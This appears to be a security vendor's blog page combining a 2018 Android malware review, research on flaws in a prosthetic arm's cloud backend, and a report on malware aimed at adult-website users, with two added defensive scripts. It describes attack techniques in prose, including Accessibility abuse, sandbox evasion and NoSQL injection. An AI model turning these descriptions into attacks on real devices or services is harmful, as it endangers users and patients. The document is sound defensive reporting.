However, banking Trojans in 2018 were noteworthy not just in terms of scale, but mechanics as well. One aspect of this is the increasingly common use of Accessibility Services in banking threats. This is partly a response to new versions of Android that make it increasingly difficult to overlay phishing windows on top of banking apps, and partly the fact that using Accessibility allows the Trojan to lodge itself in the device so that users cannot remove it by themselves. What’s more, cybercriminals can use Accessibility Services to hijack a perfectly legitimate application and force it, say, to launch a banking app to make a money transfer right there on the victim’s device. Techniques have also appeared to counter dynamic analysis; for example, the Rotexy Trojan checks to see if it is running in a sandbox. However, this is not exactly a new thing, since we have observed such behavior before. That said, it should be noted that combined with obfuscation, anti-dynamic analysis techniques can be effective if virus writers manage to infiltrate their Trojan into a popular app store, in which case both static and dynamic processing may be powerless. Although sandbox detection cannot be said to be common practice among cybercriminals, the trend is evident, and we are inclined to believe that such techniques will become very sophisticated in the near future.
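One way to review which apps hold an accessibility service on a device, given the abuse described above and in the financial threats section earlier on this page. This is an added example, not code from the report: it parses the value of the Android secure setting enabled_accessibility_services (as printed by adb shell settings get secure enabled_accessibility_services) and returns the services whose package is outside an allowlist. The allowlist and the sample value are constructed.

```python
"""Audit enabled Android accessibility services against an allowlist (added example)."""
from dataclasses import dataclass

# Packages expected to hold an accessibility service on the audited devices.
# Constructed allowlist for this example; adjust it to the fleet being reviewed.
EXPECTED_PACKAGES = frozenset({
    "com.google.android.marvin.talkback",  # TalkBack screen reader
})


@dataclass(frozen=True)
class Service:
    package: str
    class_name: str


def parse_enabled_services(raw):
    """Parse the enabled_accessibility_services setting.

    The value is a colon-separated list of flattened component names
    (package/class). An unset value is printed as "null".
    """
    raw = raw.strip()
    if raw in ("", "null"):
        return []
    services = []
    for item in raw.split(":"):
        item = item.strip()
        if not item:
            continue
        package, sep, cls = item.partition("/")
        if not sep or not package or not cls:
            raise ValueError(f"not a component name: {item!r}")
        # Short form "pkg/.Cls": the class lives in the package's own namespace.
        if cls.startswith("."):
            cls = package + cls
        services.append(Service(package, cls))
    return services


def unexpected_services(raw, expected=EXPECTED_PACKAGES):
    """Services whose package is not on the allowlist, in the order listed."""
    return [s for s in parse_enabled_services(raw) if s.package not in expected]


# Constructed sample value: TalkBack plus a service from a hypothetical flashlight app.
SAMPLE_VALUE = (
    "com.google.android.marvin.talkback/"
    "com.google.android.marvin.talkback.TalkBackService"
    ":com.example.flashlight/.UpdateService"
)

if __name__ == "__main__":
    for svc in unexpected_services(SAMPLE_VALUE):
        print("review:", svc.package, svc.class_name)
```

Anything flagged is a candidate for review rather than a verdict, since legitimate password managers and assistive tools also register accessibility services.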

Adware and potentially dangerous software

Throughout 2018, these two classes of mobile apps were in the Top 3 by number of installation packages detected. The reasons for this are many, but chief among them is the fact that adware and attacks on advertisers are a relatively safe method of enrichment for cybercriminals. Attacks of this kind do not cause damage to mobile device owners, save for some rare cases of devices overheating and burning up from the activity of an adware app deployed on them with root access. The harm is done to advertisers, since they pay for their banners being clicked by robots — infected mobile devices. Sure, there are adware apps that make it near impossible to use an infected device. For example, the victim might have to click on a dozen banners before being able to send an SMS. The problem is compounded by the fact that at the initial stages the user does not know which app installation (a flashlight or favorite game, say) led to such dire consequences, since ads are shown at random times and outside the interface of the adware-carrying app. And it only takes one such app to be installed and started for another dozen similar ones to appear, turning the device into an adware zombie. In the worst case scenario, this new wave will have a module with an exploit allowing it to write itself to the system directory or the factory settings rollback script. After that, the only way to restore the operational capacity of the device is to search for the original factory version of the firmware and download it via USB.

On a separate note, one click per banner costs less than a peanut, which is the key reason for the endless stream of unique adware apps — the more of them cybercriminals create and distribute, the more money they get. Lastly, adware modules are often coded without taking into account the confidentiality of the data transmitted, which means that requests to the advertiser’s infrastructure can be sent in unencrypted HTTP traffic and contain any amount of information about the victim, up to and including geolocation.

A slightly different situation is seen with RiskTool software, which had the largest share of all mobile threats detected in 2018. In-app purchases have long been a feature worldwide, whereby the device is tied to an account linked to a bank card. All processes are transparent to the user, and purchases can be canceled. RiskTool-type apps also feature an option for users to buy access to new levels in a game or a picture of a pretty girl, for example, but payment is totally non-transparent to the user. The app itself sends an SMS to a special number without any user involvement, and receives a confirmation message, which RiskTool reacts to; hence, the app knows about the successful payment and shows the purchased content. But the release of the promised content remains at the discretion of the app creators.

As a result, there is a huge number of RiskTool programs used to sell any content, but not requiring any significant development effort — in terms of technical implementation, sending a single SMS is doable for any novice programmer.

There is currently no reason to believe that the flood of adware and RiskTool-class apps will abate, and in 2019 we will likely see a similar picture.

Sharp rise in mobile miners

In 2018, we observed a fivefold increase in attacks using mobile miner Trojans. This growth can be attributed to several factors:

  • Mobile devices are being fitted with ever more powerful graphics processors, making them a more effective tool for cryptocurrency mining
  • Mobile devices are relatively easy to infect
  • Mobile devices are ubiquitous

Although miners are not the most conspicuous type of mobile malware, the load they generate is easily detectable by the device owner. And as soon as the latter suspects malicious activity, they will take measures to get rid of the infection. So to compensate for the outflow of victims, cybercriminals are deploying new large-scale campaigns and enhancing their malware anti-removal mechanisms.

Technologically unpretentious, mobile miners are usually based on ready-made cross-platform malware code (for example, one that works well on Linux) — one needs only to insert the receiving cryptocurrency wallet address and wrap the payload inside a mobile app with a minimal graphical interface. Distribution is via various kinds of spam and other typical methods.

Although miners cannot claim to have dislodged other mobile malware from the top positions in 2018, this does not negate the seriousness of the threat. If the miner is poorly coded or its author too greedy, the malware can damage the device’s battery or, worse, cause it to overheat and fail.

Statistics

In 2018, we detected 5,321,142 malicious mobile installation packages, which is down 409,774 on last year.

Despite this drop, in 2018 we recorded a doubling of the number of attacks using malicious mobile software: 116.5 million (against 66.4 million in 2017).

Number of attacks defeated by Kaspersky Lab products, 2018

The number of attacked users also continued its upward trajectory. From the beginning of January to the end of December 2018, Kaspersky Lab protected 9,895,774 unique users of Android devices — up 774,000 against 2017.

Number of attacked users, 2018

Geography of attacked users, 2018

Top 10 countries by share of users attacked by mobile malware

Country*       %**
Iran           44.24
Bangladesh     42.98
Nigeria        37.72
India          36.08
Algeria        35.06
Indonesia      34.84
Pakistan       32.62
Tanzania       31.34
Kenya          29.72
Philippines    26.81

* Excluded from the rating are countries with fewer than 25,000 active users of Kaspersky Lab mobile solutions over the reporting period.
** Unique users attacked in the country as a percentage of all users of Kaspersky Lab mobile solutions in the country.

Both Iran (44.24%) and Bangladesh (42.98%) retained their leading positions in the Top 10, but in Iran the percentage of infected devices fell significantly by 13 p.p. As in the previous year, the most widespread malware in Iran was the Trojan.AndroidOS.Hiddapp family. In Bangladesh, as in 2017, adware programs from the Ewind family were most common.

Nigeria (37.72%) climbed from fifth place in 2017 to third; the most common adware programs there come from the Ocikq, Agent, and MobiDash families.

Types of mobile malware

Distribution of new mobile threats by type, 2017 and 2018

Of all detected threats in 2018, the situation with mobile ransomware Trojans (1.12%) was the rosiest, with their share cut drastically by 8.67 p.p. It was a similar story with spyware Trojans (1.07%), whose share fell by 3.55 p.p. Adware apps (8.46%) also lost ground in comparison with 2017.

Trojan-Dropper threats were a marked exception, almost doubling their share from 8.63% to 17.21%. This growth reflects cybercriminals’ appetite to use mobile droppers to wrap all sorts of payloads: banking Trojans, ransomware, adware, etc. This trend looks set to continue in 2019.

Unfortunately, like Trojan-Dropper, the share of financial threats in the shape of mobile bankers also practically doubled — from 1.54% to 2.84%.

Surprisingly, SMS Trojans (6.20%) made the Top 5 by number of objects detected. This dying breed of threats is common only in a handful of countries, but that did not stop its share from increasing against 2017. Although there is no imminent talk of a revival of this class, it is still worth disabling paid subscriptions on your mobile device.

Creators of RiskTool-class threats in 2018 were just as active as last year, and not only reclaimed top position (52.06%), but even showed a slight increase.

Top 20 mobile malware

The malware rating below does not include potentially unwanted software, such as RiskTool and AdWare.

      Verdict                                %*
 1    DangerousObject.Multi.Generic          68.28
 2    Trojan.AndroidOS.Boogr.gsh             10.67
 3    Trojan-Banker.AndroidOS.Asacub.a       6.55
 4    Trojan-Banker.AndroidOS.Asacub.snt     5.19
 5    Trojan-Dropper.AndroidOS.Hqwar.ba      3.78
 6    Trojan-Dropper.AndroidOS.Lezok.p       3.06
 7    Trojan-Banker.AndroidOS.Asacub.ce      2.98
 8    Trojan-Dropper.AndroidOS.Hqwar.gen     2.96
 9    Trojan-Banker.AndroidOS.Asacub.ci      2.95
10    Trojan-Banker.AndroidOS.Svpeng.q       2.87
11    Trojan-Dropper.AndroidOS.Hqwar.bb      2.77
12    Trojan-Banker.AndroidOS.Asacub.cg      2.31
13    Trojan.AndroidOS.Triada.dl             1.99
14    Trojan-Dropper.AndroidOS.Hqwar.i       1.84
15    Trojan-Dropper.AndroidOS.Piom.kc       1.61
16    Exploit.AndroidOS.Lotoor.be            1.39
17    Trojan.AndroidOS.Agent.rx              1.32
18    Trojan-Banker.AndroidOS.Agent.dq       1.31
19    Trojan-Dropper.AndroidOS.Lezok.b       1.22
20    Trojan.AndroidOS.Dvmap.a               1.14

* Share of all users attacked by this type of malware in the total number of users attacked.

Wrapping up 2018, first place in our Top 20 mobile malware, as in previous years, goes to the verdict DangerousObject.Multi.Generic (68.28%) used for malware detected using cloud technologies in cases when the Anti-Virus databases still have no signatures or heuristics to detect it. This way, the most recent malware is uncovered.

In second place was the verdict Trojan.AndroidOS.Boogr.gsh (10.67%). This is assigned to files recognized as malicious by our machine-learning system.

Third, fourth, seventh, and ninth positions were taken by members of the Trojan-Banker.AndroidOS.Asacub family, one of the main financial threats of 2018.

Fifth and eighth places went to Trojan droppers in the Trojan-Dropper.AndroidOS.Hqwar family; they can contain malware of various families related to financial threats and adware.

The Top 10 threats also featured the old-timer Trojan-Banker.AndroidOS.Svpeng.q (2.87%), which was the most common mobile banking Trojan in 2016. This Trojan uses phishing windows to steal bank card data, and also attacks SMS banking systems.

Of particular note in the ranking are positions 13 and 20, occupied respectively by Trojan.AndroidOS.Triada.dl (1.99%) and Trojan.AndroidOS.Dvmap.a (1.44%). These two Trojans are extremely dangerous, since they use superuser privileges to carry out their malicious activity. In particular, they place their components in the device’s system area, which the user only has read access to, and hence they cannot be removed using regular system tools.

Mobile banking Trojans

In 2018, we detected 151,359 installation packages for mobile banking Trojans, which is 1.6 times more than in the previous year.

Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, 2018

Monitoring the activity of mobile banking Trojans, we registered a giant leap in the number of attacks using this malware. Nothing like this has ever been observed before. The growth began in May 2018, and the attacks peaked in September. The culprits were the Asacub and Hqwar families, due to their members spreading with record frequency.

Number of attacks by mobile banking Trojans, 2017 and 2018

Countries by share of users attacked by mobile bankers, 2018

Top 10 countries by share of all users attacked by mobile bankers

Country*        %**
Russia          2.32
South Africa    1.27
US              0.82
Australia       0.71
Armenia         0.51
Poland          0.46
Moldova         0.44
Kyrgyzstan      0.43
Azerbaijan      0.43
Georgia         0.42

* Excluded from the rating are countries with fewer than 25,000 active users of Kaspersky Lab mobile solutions over the reporting period.
** Unique users attacked by mobile bankers in the country as a percentage of all users of Kaspersky Lab mobile solutions in the country.

In top position, like last year, was Russia, where 2.32% of users encountered mobile banking Trojans. The most common families in Russia were Asacub, Svpeng, and Agent.

In second place was South Africa (1.27%), where members of the Agent banking family were the most active spreaders. US users (0.82%) most frequently encountered members of the Svpeng and Asacub banking families.

The most common family of mobile bankers in 2018 was Asacub — its members attacked 62.5% of all users who encountered mobile bankers.

Mobile ransomware Trojans

The statistics for Q1 2018 showed that the number of ransomware Trojans spreading without the assistance of droppers or downloaders had radically decreased. The reason for this was the ubiquitous use of a two-stage mechanism for distributing these malicious programs through Trojan droppers. A total of 60,176 mobile ransomware installation packages were detected throughout 2018, which is nine times less than in 2017.

Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab, 2018

The number of attacks involving mobile ransomware gradually declined over the first half of the year. However, June 2018 saw a sharp increase in the number of attacks, almost 3.5-fold.

Number of attacks by mobile ransomware Trojans, 2017 and 2018

In 2018, Kaspersky Lab products protected 80,638 users in 150 countries against mobile ransomware.

Countries by share of users attacked by mobile ransomware, 2018

Top 10 countries by share of all users attacked by mobile ransomware

| Country* | %** |
|---|---|
| US | 1.42 |
| Kazakhstan | 0.53 |
| Italy | 0.50 |
| Poland | 0.49 |
| Belgium | 0.37 |
| Ireland | 0.36 |
| Austria | 0.28 |
| Romania | 0.27 |
| Germany | 0.26 |
| Switzerland | 0.22 |

* Excluded from the rating are countries with fewer than 25,000 active users of Kaspersky Lab mobile solutions over the reporting period.
** Unique users attacked by mobile ransomware in the country as a percentage of all users of Kaspersky Lab mobile solutions in the country.

For the second year running, the country most under attack from mobile ransomware was the US, where 1.42% of users encountered it. As in the previous year, members of the Trojan-Ransom.AndroidOS.Svpeng family were the most common ransomware Trojans in the country.

In second-place Kazakhstan (0.53%), the most active ransomware families were Trojan-Ransom.AndroidOS.Small and Trojan-Ransom.AndroidOS.Rkor. The latter is not unlike other ransomware in that it shows victims an indecent picture and accuses them of viewing illegal materials.

In actual fact, the Trojan does not carry off any personal data or “suspend the servicing of the device”, as the warning claims. But the process of removing malware from an infected device can be difficult.

Conclusion

For seven years now, the world of mobile threats has been constantly evolving, not only in terms of number of malicious programs and technological refinement of each new malware modification, but also due to the increasing ways in which money and valuable information can be acquired using mobile devices. The year 2018 showed that a relative lull in certain types of malware can be followed by an epidemic. Last year, it was the banking Trojan Asacub and co.; in 2019 it could be a wave of ransomware, seeking to make up lost ground.

February 26, 2019

How to Attack and Defend a Prosthetic Arm

The IoT world has long since grown beyond the now-ubiquitous smartwatches, smartphones, smart coffee machines, cars capable of sending tweets and Facebook posts and other stuff like fridges that send spam. Today’s IoT world now boasts state-of-the-art solutions that quite literally help people. Take, for example, the biomechanical prosthetic arm made by Motorica Inc. This device helps people who have lost a limb to restore movement.

Via dedicated sensors, the biomechanical prosthetic arm reads the muscle contraction parameters and analyzes them to produce movements with the robotic fingers. The arm takes little time to get used to standard movements, after which it becomes a full-fledged assistant.

Like other IoT devices, the prosthetic arm sends statistics to the cloud, such as movement amplitudes, the arm’s positions, etc. And just like other IoT devices, this valuable invention must be checked for vulnerabilities.

In our research, we focused on those attack vectors that can be implemented without the arm owner’s knowledge. Below is a standard diagram of the arm’s interactions with the outside world.

Each arm is equipped with an embedded SIM card, which it uses to access the internet and send statistics and other information about the arm’s status. A connection is established to Motorica’s remote cloud, which is an interface for remotely monitoring the status of all registered biomechanical arms. One good thing about the arm’s current architecture is that the connection between the arm and the cloud is unidirectional: only the arm sends data to the cloud, while the cloud sends nothing back. However, Motorica Inc. says it plans to implement this feature later.

The basic logic of the arm, such as movement directions, switching motors on or off, etc., is implemented in the C language. The cloud for receiving, processing and storing information is implemented based on the following technologies:

  • NodeJS – for backend,
  • ReactJS – for frontend,
  • MongoDB – database.

Arm-wrestling

At first, we decided to attack the logic of the arm. But soon we discovered that the C code is well-structured and has no vulnerabilities in it. However, the arm that we tested has only the basic functionality. Motorica Inc. wants to add more functions to its biomechanical limbs: smartphone interconnect, contactless payments and other useful features. From our point of view, all these new technologies must be tested for cybersecurity. Especially the ones that could be exploited for MiTM attacks.

Then we started to analyze the protocol used to send the statistics to the cloud and the logic for processing that information on the server. The initial findings showed that the data was sent using the insecure HTTP protocol. A little later we found some incorrect account operations and insufficient input validation that can be used by a remote attacker to:

  • gain access to information about all the accounts in the cloud including the logins and passwords (in plaintext) for all the prosthetic arms and administrators,
  • add or delete regular and privileged users (with administrator rights),
  • launch attacks against administrators via the cloud and then attack Motorica’s internal infrastructure,
  • perform NoSQL injection,
  • cause denial of service for cloud administrator.

In our research we did not go deep into analysis of the data transferred between the muscle sensors and the arm itself, or study how the device is interconnected with contactless payment systems or smartphones. These look like very promising research fields for the next years.

What type of attackers might be interested in such attacks, that is, in getting a prosthetic arm’s data? It’s difficult to say at this moment. However, when biomechanical limbs become more intelligent, attacks could become more beneficial to their perpetrators. Or, when an arm gets connected to a neuro-implanted brain chip, a remote attacker will get access to something more valuable than money. Anyway, all IoT devices (and especially biomechanical ones) should be tested for cybersecurity issues at every stage of development.

If you create amazing technologies that are bigger and more important than just classical IoT devices, that help people or even save lives, you have to check how your technology works and whether there is a chance to attack your device and harm people. To prevent basic vulnerabilities, please follow the best coding practices, implement SDL, do security source code review, appoint a security champion in your development team, and do external vulnerability research and penetration testing. All these useful and much-needed steps will increase the cybersecurity level of your devices and technologies.

February 21, 2019

Threats to users of adult websites in 2018

Introduction

2018 was a year that saw campaigns to decrease online pornographic content and traffic. For example, one of the most adult-content friendly platforms – Tumblr – announced it was banning erotic content (even though almost a quarter of its users consume adult content). In addition, the UK received the title of ‘The Second Most Porn-Hungry Country in the World’ and is now implementing a law on age-verification for pornography lovers that will prohibit anyone below the age of 18 from watching this sort of content. This is potentially opening a world of new tricks for scammers and threat actors to take advantage of users. In addition, even commercial giant Starbucks declared a ‘holy war’ on porn as it was revealed that many visitors prefer to have their coffee while consuming adult content, rather than listening to music or reading the latest headlines on news websites.

Such measures might well be valid, at least from a cybersecurity perspective, as the following example suggests. According to news reports last year, an extremely active adult website user, who turned out to be a government employee, dramatically failed to keep his hobby outside of the workplace. By accessing more than 9,000 web pages with adult content, he compromised his device and subsequently infected the entire network with malware, leaving it vulnerable to spyware attacks. This, and other examples confirm that adult content remains a controversial topic from both a social and cybersecurity standpoint.

It is no secret that digital pornography has long been associated with malware and cyberthreats. While some of these stories are now shown to be myths, others are very legitimate. A year ago, we conducted research on the malware hidden in pornography and found out that such threats are both real and effective. One of the key takeaways of last year’s report was the fact that cybercriminals not only use adult content in multiple ways – from lucrative decoys to make victims install malicious applications on their devices, to topical fraud schemes used to steal victims’ banking credentials and other personal information – but they also make money by stealing access to pornographic websites and reselling it at a cheaper price than the cost of a direct subscription.

Last year, we discovered a number of malicious samples that were specifically hunting for credentials to access some of the most popular pornographic websites. When we considered why someone would hunt for credentials to pornographic websites, we checked the underground markets (both on the dark web and on open parts of the internet) and found that credentials to pornography website accounts are themselves quite a valuable commodity to be sold online. They are for sale in their thousands.

It would be going too far to say that the findings from our previous exploration of the relationships between cyberthreats and adult content were unexpected. At the end of the day, pornography has always been, and remains one of the most sought after types of online content. At the same time, cybercriminals have always looked to increase their profits with the most efficient and cheapest way of delivering malicious payloads to victims. It was almost inevitable that adult content would become an important tool for them.

That said, our monitoring of the wider cyberthreat landscape shows that threat actors tend to change their habits, tactics and techniques over time. This means that even in a niche area, such as pornographic content and websites, changes are possible. That is why this year we decided to repeat our exercise and investigate the topic once again. As it turned out, some things have indeed changed.

Methodology and key findings

To measure the level of risk that may be associated with adult content online, we investigated several different indicators. We examined malware disguised as pornographic content, and malware that hunts for credentials to access pornography websites. We looked at the threats that are attacking users across the internet in order to find out which popular websites might be dangerous to visit. Additionally, we checked our phishing and spam database to see if there is a lot of pornographic content on file and how it is used in the wild. Using aggregated threat-statistics obtained from the Kaspersky Security Network – the infrastructure dedicated to processing cybersecurity-related data streams from millions of voluntary participants around the world – we measured how often and how many users of our products have encountered adult-content themed threats.

Additionally, we checked around twenty underground online markets and counted how many accounts are up for sale, which are the most popular, and the price they are sold for.

As a result, we discovered the following:

  • Searching for pornography online has become safer: in 2018, 650,000 users faced attacks launched from online resources. That is 36% less than in 2017 when more than a million of these attacks were detected.
  • Cybercriminals are actively using popular porn-tags to promote malware in search results. The 20 most popular make up 80% of all malware disguised as porn. Overall, 87,227 unique users downloaded porn-disguised malware in 2018, with 8% of them using a corporate rather than personal network to do this.
  • In 2018, the number of attacks using malware to hunt for credentials that grant access to pornography websites grew almost three-fold compared to 2017, with more than 850,000 attempts to install such malware. The number of users attacked doubled, with 110,000 attacked PCs across the world.
  • The number of unique sales offers of credentials for premium accounts to adult content websites almost doubled to more than 10,000.
  • Porn-themed threats increased in terms of the number of samples, but declined in terms of variety: In 2018, Kaspersky Lab identified at least 642 families of PC threats disguised under one common pornography tag. In terms of their malicious function, these families were distributed between 57 types (76 last year). In most cases they are Trojan-Downloaders, Trojans and AdWare.
  • 89% of infected files disguised as pornography on Android devices turned out to be AdWare.
  • In Q4 2018, there were 10 times as many attacks coming from phishing websites pretending to be popular adult content resources, compared to Q4 2017 when the overall figure reached 21,902 attacks.

Part 1 – Malware

As mentioned above, cybercriminals put a lot of effort into delivering malware to user devices, and pornography serves as a great vehicle for this. Most malware that reaches users’ computers from malicious websites is usually disguised as videos. Users who do not check the file extension and go on to download and open it, are sent to a webpage that extorts money. This is achieved by playing the video online or for free only after the user agrees to install a malicious file disguised as a software update or something similar. However, in order to download anything from this kind of website, the user first has to find the website. That is why the most common first-stage infection scenarios for both PC and mobile porn-disguised malware involve the manipulation of search query results.

To do this, cybercriminals first identify which search requests are the most popular among users looking for pornography. They then implement so-called ‘black SEO’ techniques. This involves changing the malicious website content and description so it appears higher up on the search results pages. Such websites can be found in third or fourth place in the list of search results.

According to our findings, this method is still actively used but its efficiency is falling. To check this, we took 100 of the top listed pornographic websites (as suggested by search engines after entering a query for the word ‘porn’), plus those that have the word ‘porn’ in the title. We checked if any of them pose any threat to users. It turned out that in 2017 our products stopped more than a million users from attempting to install malware from websites on the list. However, in 2018, the number of users affected decreased to 658,930. This could be the result of search engines putting processes in place to fight against ‘black SEO’ activities and protecting users from malicious content.

Porn tags = Malware tags

Optimizing malicious websites so as to ensure that those wanting to view adult content will find them is not the only tool criminals explore in order to find the best ways of delivering infected files to victims’ devices. It turned out during our research that cybercriminals are disguising malware or not-a-virus files as video files and naming them using popular porn tags. A ‘porn tag’ is a special term that is used to easily identify content from a specific pornographic video genre. Tags are used by pornography websites to organize their video libraries and help users to quickly and conveniently find the video they are interested in. The not-a-virus type of threats is represented here by RiskTools, Downloaders and AdWare. Each type is not typically classified as malware, yet such applications may do something unwanted to users. AdWare, for instance, can show users unsolicited advertising, alter search results and collect user data to show targeted, contextual advertising.
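
The check that a user skips when a download is named like a video can be automated. The following added example (not from the original report) compares a file's name with its leading bytes and flags executables, shortcuts and archives presented as video; the extension lists, reason labels and sample bytes are assumptions constructed for the example.

```javascript
// Added example; file names and byte strings are constructed samples.

const MEDIA_EXT = new Set(["mp4", "avi", "mkv", "wmv", "mov", "flv"]);
const RISKY_EXT = new Set(["exe", "scr", "js", "vbs", "lnk", "apk", "bat", "cmd"]);

// Leading-byte signatures: [kind, offset, bytes].
const SIGNATURES = [
  ["pe-executable", 0, [0x4d, 0x5a]],           // "MZ"
  ["zip-or-apk", 0, [0x50, 0x4b, 0x03, 0x04]],  // "PK\x03\x04"
  ["windows-lnk", 0, [0x4c, 0x00, 0x00, 0x00]], // shortcut header size 0x4C
  ["video", 4, [0x66, 0x74, 0x79, 0x70]],       // MP4/MOV "ftyp" box
  ["video", 0, [0x1a, 0x45, 0xdf, 0xa3]],       // Matroska/WebM EBML header
];

// Identify the container type from the first bytes of the file.
function sniffKind(bytes) {
  for (const [kind, offset, sig] of SIGNATURES) {
    if (bytes.length >= offset + sig.length &&
        sig.every((b, i) => bytes[offset + i] === b)) {
      return kind;
    }
  }
  return "unknown";
}

// All dot-separated extensions of the base name, lowercased: "a.mp4.exe" -> ["mp4", "exe"].
function extensionsOf(fileName) {
  const base = fileName.toLowerCase().split(/[\\/]/).pop();
  return base.split(".").slice(1);
}

// Compare what the name claims with what the content is.
function triageDownload(fileName, bytes) {
  const exts = extensionsOf(fileName);
  const last = exts[exts.length - 1] || "";
  const claimsMedia = exts.some((e) => MEDIA_EXT.has(e));
  const kind = sniffKind(bytes);
  const reasons = [];
  // The extension the OS acts on is executable or a script/shortcut.
  if (RISKY_EXT.has(last)) reasons.push("executable-extension");
  // A media extension appears in the name but is not the final one.
  if (claimsMedia && !MEDIA_EXT.has(last)) reasons.push("double-extension");
  // The name says video, the header says something else that we recognise.
  if (claimsMedia && kind !== "video" && kind !== "unknown") {
    reasons.push("content-mismatch");
  }
  return { kind, verdict: reasons.length ? "suspicious" : "ok", reasons };
}

// Constructed samples: only the first bytes of each file type.
const MP4_SAMPLE = Uint8Array.from([0, 0, 0, 0x18, 0x66, 0x74, 0x79, 0x70, 0x69, 0x73, 0x6f, 0x6d]);
const PE_SAMPLE = Uint8Array.from([0x4d, 0x5a, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00]);
const LNK_SAMPLE = Uint8Array.from([0x4c, 0x00, 0x00, 0x00, 0x01, 0x14, 0x02, 0x00]);

function demoTriage() {
  return {
    realVideo: triageDownload("holiday.mp4", MP4_SAMPLE),
    doubleExt: triageDownload("clip.mp4.exe", PE_SAMPLE),
    renamedExe: triageDownload("clip.mp4", PE_SAMPLE),
    shortcut: triageDownload("C:\\Users\\a\\Downloads\\video.lnk", LNK_SAMPLE),
  };
}

console.log(JSON.stringify(demoTriage(), null, 2));
```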

To check how widespread this trend is, we took the most popular classifications and tags of adult videos from three major legal websites distributing adult content. The groupings were chosen by the overall number of videos uploaded in each category on the websites. As a result, we came up with a list of around 100 tags, which between them may well cover every possible type of pornography in existence. Subsequently, we ran those tags against our database of threats and through the Kaspersky Security Network databases and figured out which of them were used in malicious attacks and how often.

The overall number of users attacked with malware and not-a-virus threats disguised as porn-themed files dropped by about half compared to 2017. While back then their total number was 168,702, the situation in 2018 was a little more positive: down to 87,227, with 8% of them downloading porn-disguised malware from corporate networks. In this sense, scammers are merely following the overall trend: according to Pornhub’s statistics, the share of pornography viewed on desktops has dropped by 18%. However, we were not able to get full confirmation that the 2018 decrease in the number of users attacked with malicious pornography relates to changes in consumer habits.

Perhaps one of the most interesting takeaways we got from the analysis of how malware and not-a-virus are distributed among porn tags, is that although we were able to identify as many as 100 of them, most of the attacked users (around 80%, both in 2017 and 2018) encountered threats that mention only 20 of them. The tags used most often match the most popular tags on legitimate websites. Although we couldn’t find perfect correlations between the top watched types of adult video on legitimate websites and the most often encountered porn-themed threats, the match between malicious pornography and safe pornography means that malware and not-a-virus authors follow trends set by the pornography-viewing community.

Moving forward, the overall picture surrounding porn-disguised threat types showed more changes in 2018 when compared to 2017. In 2018, we saw 57 variations of threats disguised as famous porn tags, from 642 families. For comparison, the figures in 2017 were 76 and 581 respectively. That means that while the number of samples of porn-malware is growing, the number of types of malware and not-a-virus that are being distributed through pornography is decreasing.

The top three most popular classes of threats turned out to be Trojan-Downloader, with 45% of files, Trojan with 20% and AdWare, which is not a virus, with 9%, while in 2017 the top three were different: Trojan-Downloader was still there with 29%, exploits took the second place with 23% and Trojans accounted for around 19%.

| Distribution of porn-themed threat types in 2017 | Share | Distribution of porn-themed threat types in 2018 | Share |
|---|---|---|---|
| Trojan-Downloader | 29% | Trojan-Downloader | 45% |
| Exploit | 23% | Trojan | 20% |
| Trojan | 19% | AdWare (not a virus) | 9% |
| AdWare (not a virus) | 11% | Worm | 8% |
| Worm | 6% | Virus | 2% |
| Virus | 2% | Downloader (not a virus) | 2% |
| RiskTool (not a virus) | 2% | Exploit | 2% |
| Downloader (not a virus) | 2% | Trojan-Dropper | 2% |
| Trojan-Dropper | 1% | UDS: DangerousObject | 2% |
| Other | 5% | Other | 8% |

Top-10 types of threat that went under the disguise of porn-related categories, by the number of attacked users in 2017 and 2018. Source: Kaspersky Security Network

Top-10 verdicts which went under the disguise of porn-related categories, by the number of attacked users in 2017 and 2018. Source: Kaspersky Security Network

The most noticeable change in the overall picture is the large number of exploits in 2017: back then they accounted for almost a quarter of all infected files, while in 2018 they were not represented in the top 10. There is an explanation for the popularity of such threats. In 2017, exploits were represented by massive detections of Exploit.Win32.CVE-2010-2568.gen, a generic detection (the detection that describes multiple similar malware pieces) for files that exploited the vulnerability in the Windows Shell named CVE-2010-2568. However, the same detection name applies for another vulnerability in LNK – CVE-2017-8464. This vulnerability, and the publicly available exploit for it, became public in 2017 and immediately raised a lot of interest amongst threat actors – thereby raising the bar in exploit detections. Within a year, the attacks on CVE-2017-8464 reduced significantly as most users patched their computers and malware writers went back to using classical malware aimed at more common file formats (such as JS, VBS, PE).

The rise in popularity of Trojan-Downloaders can be explained by the fact that such malicious programs are multipurpose: once installed on a victim’s device, the threat actor could additionally download virtually any payload they want: from DDoS-bots and malicious ads clickers to password stealers or banking Trojans. As a result, a criminal would need to infect the victim’s device only once and would then be able to use it in multiple malicious ways.

2018 has also seen some changes in the share of software that is not-a-virus. All in all, such programs accounted for 15% of all threats in 2017. In 2018, however, they were on the decline and now account for 11%, with downloaders losing their place in the top-10 most prolific threats. So, while the attackers are using porn less as a decoy, they have yet to inject the malicious files with more harmful threats, such as Trojans and worms.

Mobile malware

Following technical changes in how we detect and analyze mobile malware, we amended our methodology for this report. Instead of trying to identify the share of porn-themed content in the overall volume of malicious applications that our users encountered, we selected 100,000 random malicious installation packages disguised as porn videos for Android, in 2017 and 2018, and checked them against the database of popular porn tags.

The landscape for types and families of mobile threats is also different than for PC. In both 2017 and 2018, the most common type of threat was AdWare: 70% in 2017 and 89% in 2018.

| Malware name | % | Malware name | % |
|---|---|---|---|
| not-a-virus:HEUR:AdWare.AndroidOS.Agent.n | 59.61% | not-a-virus:HEUR:AdWare.AndroidOS.Agent.f | 62.88% |
| not-a-virus:HEUR:AdWare.AndroidOS.Ewind.h | 11.02% | not-a-virus:HEUR:AdWare.AndroidOS.Agent.n | 17.09% |
| HEUR:Trojan-Ransom.AndroidOS.Zebt.a | 5.33% | not-a-virus:HEUR:AdWare.AndroidOS.Ewind.h | 9.62% |
| HEUR:Trojan.AndroidOS.Loapi.b | 3.76% | HEUR:Trojan-Ransom.AndroidOS.Zebt.a | 3.27% |
| HEUR:Trojan-Ransom.AndroidOS.Small.snt | 2.22% | HEUR:Trojan.AndroidOS.Boogr.gsh | 0.74% |
| HEUR:Trojan-Dropper.AndroidOS.Agent.hb | 1.93% | HEUR:Trojan-Ransom.AndroidOS.Small.snt | 0.74% |
| not-a-virus:HEUR:AdWare.AndroidOS.Agent.f | 1.90% | UDS:DangerousObject.Multi.Generic | 0.52% |
| HEUR:Trojan-Ransom.AndroidOS.Small.as | 1.54% | HEUR:Trojan-Ransom.AndroidOS.Small.as | 0.41% |
